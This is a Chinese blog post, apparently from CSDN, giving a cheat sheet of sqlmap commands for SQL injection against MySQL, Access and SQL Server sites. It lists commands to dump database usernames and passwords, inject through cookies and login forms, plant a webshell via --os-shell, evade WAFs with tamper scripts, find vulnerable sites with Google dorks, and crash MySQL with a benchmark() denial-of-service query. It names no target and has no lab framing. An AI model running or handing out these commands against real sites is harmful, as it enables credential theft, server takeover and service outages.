Sqlmap该如何使用?

最新推荐文章于 2024-04-20 11:53:06 发布
最新推荐文章于 2024-04-20 11:53:06 发布
阅读量281 收藏 1
点赞数
文章标签: 数据库 sql mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Cairo_A/article/details/130392904
版权

1. MySQL数据库注入

  • 检查注入点(主要看是否能返回消息):sqlmap.py -u url
  • 爆所有库:sqlmap.py -u url -dbs
  • 爆当前库:sqlmap.py -u url --current-db

2.Access数据库注入

  • 判断是否是access数据库:url and exists(select id from MSysAccessObjects)
    其他数据库判断语句:

Access: aNd aSc(cHr(97))=97
Access: and exists(select id from MSysAccessObjects)
SQL Server: and exists(select id from sysobjects)
SQL Server: and length(user)>0
MySQL: and length(user())>

  • access数据库没有库的概念,直接爆表sqlmap.py -u "url" --tables
  • 爆列,爆字段,可以在日志里找到

3. 指定数据库,操作系统

  • 检查是否是注入点
  • 爆库:sqlmap.py -u url --dbms mysql 5.0 --current-db
  • 爆表:sqlmap.py -u url --dbms mysql 5.0 -D cms --tables
  • 爆列:sqlmap.py -u url --dbms mysql 5.0 -D cms -T cms_user --columns
  • 爆字段:sqlmap.py -u url --dbms mysql 5.0 -D cms -T cms_users -C password ,username --dump

4. 请求延时注入

  • 测试注入点:sqlmap.py -u url -p id
  • sqlmap注入方式techniquesqlmap.py -u url --technique T

B: 基于Boolean的盲注(Boolean based blind)
Q: 内联查询(inlin queries)
T: 基于时间的盲注(time based blind)
U: 联合查询(union query based)
E: 错误(error based)
S: 栈查询(stack queries)

  • 猜数据库sqlmap.py -u url --technique T -time-sec 9 --current-db
  • 其他参数:--delay--safe-freq

5.常规伪静态注入

伪静态:主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。

  • 加星花:sqlmap.py -u "url*.html" --dbs
  • 利用sqlmap注入:sqlmap.py -u "url*.html" --current-db --hex
  • 爆表:sqlmap.py -u "url*.html" -D "cms" --tables –hex

6.cookie注入

  • burpsuite获得cookie
  • sqlmap的cookie注入攻击:sqlmap.py -u url --cookie “uname=admin" --level 2
  • 爆库,爆表,爆列,爆字段

7.POST登录框注入

  • burpsuite抓包右键保存到\Python2\sqlmap中

  • 测试能否注入sqlmap.py -r 1.txt -p user(-r:让sqlmap加载post请求,-p:指定注入用的参数)

  • 爆库 sqlmap.py -r 1.txt --current-db

  • 自动搜索表单:sqlmap.py -u url --form

  • 指定一个参数:sqlmap.py -u url --data "name=1&pass=1"

8.交互式写shell及命令执行

  • 测试注入点:sqlmap.py -u url -p id
  • 利用SQLmap写webshell:sqlmap.py -u url --os-shell 输入脚本语言,输入网站绝对路径

9.绕过WAF防火墙

  • 利用tamper脚本绕过过滤: sqlmap.py -u url --dbs --batch --flush-session --tamper=equaltolike.py,space2comment.py,randomcase.py

10.sqlmap模板使用,编写

  • 尝试注入 and 1=1被拦截
  • 利用%0a尝试绕过,发现可以
  • 编写tamper模板,利用sqlmap跑库(c:\python27\sqlmap\tamper)
  • 利用sqlmap跑库sqlmap.py -u "url" --dbs --batch --tamper=equaltolike.py, space2mssqlhash.py, randomcase.py, space2hassh.py, base64encode.py, charencode.py

11.利用sqlmap来google搜索

  • 查找页面:sqlmap.py -g inurl:php?id=

12.sqlmpa进行Mysql DOS攻击

  • 获得shell:sqlmap.py -u url --sql-shell
  • 进行攻击:select benchmark(9999999999,0*70726f63409284209)
黑客-小千
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入--利用sqlmap工具注入
weixin_52151447的博客
11-18 2304
1、判断是否注入,进入cmd输入sqlmap.py -u
sqlmap 跑access_access注入篇+sqlmap
weixin_28911533的博客
12-24 1177
access数据库的来历,我就不说了,因为我懒的记,就算记了感觉上也没大多用处,只要记得数据库的结构就行了。先是表名,然后是列名,再者就是数据,我发个实际的图吧,大概就是这么一个结构。下面,开始说下未过滤的SQL代码,说是SQL代码,其实应该说是asp代码,因为,很多access数据库都是和asp这个脚本语言相连的,关于asp这个脚本语言细节,想深入了解的可以百度下,毕竟搜索引擎也是一个很好的老师...
Sqlmap的基本用法
m0_74989372的博客
04-12 846
id=1 -C"username,password" --dump -T users -D security)爆指定数据库的表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆数据库 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆所有表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?用sql注入靶场进行演示。
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇_sqlmap靶场
最新发布
2401_84239625的博客
04-20 758
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注软件测试)一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
如何使用sqlmap爆库和挂马
Leslieyzz的博客
01-19 2382
如何使用sqlmap爆库和挂马的技术博客
sqlmap使用详解
weixin_59246157的博客
04-21 1659
id=1" -D security -T users -C username --dump --start 1 --stop 100 #爆出数据库security中的users表中的username列中的前100条数据。
dvwa爆数据库andsqlmap数据库
2301_77315080的博客
08-28 436
正常提交payload为1。
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
SQLMAP神器使用.pdf
01-05
以下是对SQLMap使用的一些关键知识点的详细解释: 1. **安装与环境配置**: - 首先,需要确保已安装Python 2.7版本,因为SQLMap主要支持这个版本。 - 解决Python 2.7和Python 3之间的版本冲突,避免它们互相干扰...
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
SqlMap使用
06-24
本文档详细介绍了SqlMap使用教程,SQL注入攻击是黑客对数据库进行攻击的常用手段之一
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。
史上最详细sqlmap入门教程
热门推荐
weixin_44867191的博客
05-16 1万+
最近做安全测试,遇到了SQL盲注的漏洞,从发现漏洞,确认漏洞,协助开发复现漏洞,验证漏洞一整套流程下来,有了亿点点收获,下面分享给大家,希望对软件测试同学有所启发,难度不大,小白看完也能上手的那种。
sql注入之mysql数据库 sqlmap工具 伪静态注入 注入防御
weixin_46476861的博客
03-03 2848
python2和python3互不兼容,SqlMap是基于python2的,用2.7或之前的,所以SqlMap不支持python3 -u –level –risk -v 在包里参数进行测试语句 -m –mobile app通过抓包能得到url,但是不能在电脑地址栏里转到,所以需要模拟手机 -batch-smart 注入过程不需要在选择y或者n ctrl+c取消暴力破解 -r -p -threads 数据库外围命令
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 3366
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
python自动化测试工具 waf_SQLmap绕waf实现自动测试
weixin_39958248的博客
11-24 284
前言Sqlmap是python写的一个开源测试工具,因支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access 等多个份额较多的数据库,且功能强悍被众多安全测试者所使用,在现实的测试环境中,有很多测试者遇到注入都习惯使用Sqlmap去进行测试,假如Sqlmap无法跑出来,就不进行深入测试了,本文笔者将拿一个真实遇到的小例...
Sqlmap入门爆库、爆表、爆字段、爆记录
weixin_56306210的博客
10-31 2203
Sqlmap爆库、爆表、爆字段、爆记录
Sqlmap常用命令总结及注入实战(Access、mysql
上善若水~的博客
05-14 1050
sqlmap常用命令总结: 注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行) 1#、注入六连: 1.   sqlmap -u  “http://www.xx.com?id=x”    【查询是否存在注入点 –dbs         【检测站点包含哪些数据库 3.     --curre
sqlmap入门-爆库,爆表,列,字段
weixin_46626737的博客
11-14 6948
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs爆数据库 假设结果中有member数据库 ②爆表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③爆列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④爆字段 python sq
现有一个网页,已知它存在注入点,你该如何利用sqlmap进行注入?请简述注入的过程。
06-10
首先,你需要使用sqlmap工具对该网页进行扫描,以确定注入点的存在性。如果sqlmap检测到注入漏洞,则可以使用以下命令进行注入: ``` sqlmap -u URL --dump ``` 其中,URL是目标网页的地址。--dump选项用于获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值